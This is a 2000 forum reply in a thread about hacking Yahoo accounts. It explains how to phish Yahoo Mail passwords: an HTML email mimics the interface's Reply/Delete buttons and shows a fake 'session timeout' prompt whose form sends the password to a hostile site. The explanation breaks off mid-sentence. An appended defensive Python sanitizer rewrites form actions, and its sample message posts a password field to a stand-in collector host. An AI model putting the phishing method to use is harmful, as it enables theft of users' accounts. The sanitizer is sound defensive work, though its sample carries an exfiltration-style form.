
Date Posted: 13:03:16 09/12/00 Tue
Author: CZ
Subject: Re: I hacked yahoo accounts!!
In reply to: CyberStalker 's message, "I hacked yahoo accounts!!" on 12:38:04 09/12/00 Tue

Another way but a little tricky.

Requirements:
You have to send an email message to the user's account at, for example, Yahoo.com. When they log in to read their mail and click the "Reply" or "Delete" button at the bottom of the message, Yahoo Mail appears to prompt them within the same window, "Session timeout: Please re-enter your password". When the password is re-entered, it is sent to a hostile site and the user continues reading their mail without noticing anything unusual.

How it works
Yahoo! Mail does not re-write the "action" attribute of a <form> tag contained in an email message when that message is displayed to the user. Yahoo Mail is smart enough to insert a "target" attribute into a link, for example, so that when you click on a link that someone sends you, it opens in a separate browser window. (This way, you can't fool the user into thinking that they're still inside Yahoo Mail and give them a message like "please re-enter your password".) However, their mail parser does not re-write the "action" attribute. (HotMail, on the other hand, does re-write the "action" attribute so this trick won't work.) That means when you click to submit a form inside an HTML email message, the result will be displayed in the same frame.

In order to get the user to submit a form within the Yahoo Mail message, make them think they're clicking on the "Reply" or "Delete" button provided by the Yahoo Mail interface. It's easy to figure out how the Yahoo Mail HTML interface is formatted, so in your HTML message, you just insert your own buttons, tables, etc. to look exactly like the bottom half of the real Yahoo message-reading interface. Follow this with an HTML opening comment "
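
The mitigation side of the gap described in this post, as an added example that is not part of the original post or any mail provider's code: a rewriter that gives forms the same treatment the post says links received (a forced "target") and replaces the form's "action". `WARN_URL`, the class and function names, and the sample message are assumptions constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote
WARN_URL = "/mail/external-form?dest="  # hypothetical interstitial (assumption)

class MailHtmlRewriter(HTMLParser):
    """Re-emit HTML mail so links and forms cannot load inside the mail frame."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []       # rewritten markup
        self.findings = []  # original form destinations, kept for logging

    def _start(self, tag, attrs):
        attrs = [(k, v or "") for k, v in attrs]
        if tag in ("a", "form"):
            # Override any sender-supplied target.
            attrs = [(k, v) for k, v in attrs if k != "target"]
            attrs.append(("target", "_blank"))
        if tag == "form":
            # Send the submission to a warning page, not the sender's URL.
            dest = dict(attrs).get("action", "")
            self.findings.append(dest)
            attrs = [(k, v) for k, v in attrs if k != "action"]
            attrs.append(("action", WARN_URL + quote(dest, safe="")))
        if tag in ("input", "button"):
            # formaction/formtarget would override the rewritten form.
            self.findings += [v for k, v in attrs if k == "formaction"]
            attrs = [(k, v) for k, v in attrs
                     if k not in ("formaction", "formtarget")]
        rendered = "".join(f' {k}="{escape(v, quote=True)}"' for k, v in attrs)
        self.out.append(f"<{tag}{rendered}>")

    handle_starttag = handle_startendtag = _start

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Escape text so unparsed fragments cannot come back as markup.
        self.out.append(escape(data, quote=False))

def rewrite_mail_html(html):
    parser = MailHtmlRewriter()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.findings

SAMPLE = ('<form action="http://collector.example/login"><input type="password" '
          'name="p"><input type="submit" value="Reply"></form>')  # constructed
if __name__ == "__main__": print(*rewrite_mail_html(SAMPLE), sep="\n")
```

Because no comment handler is defined, HTML comments in the message are dropped from the output; a production sanitizer would also apply a tag and attribute allow-list, which this example does not attempt.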
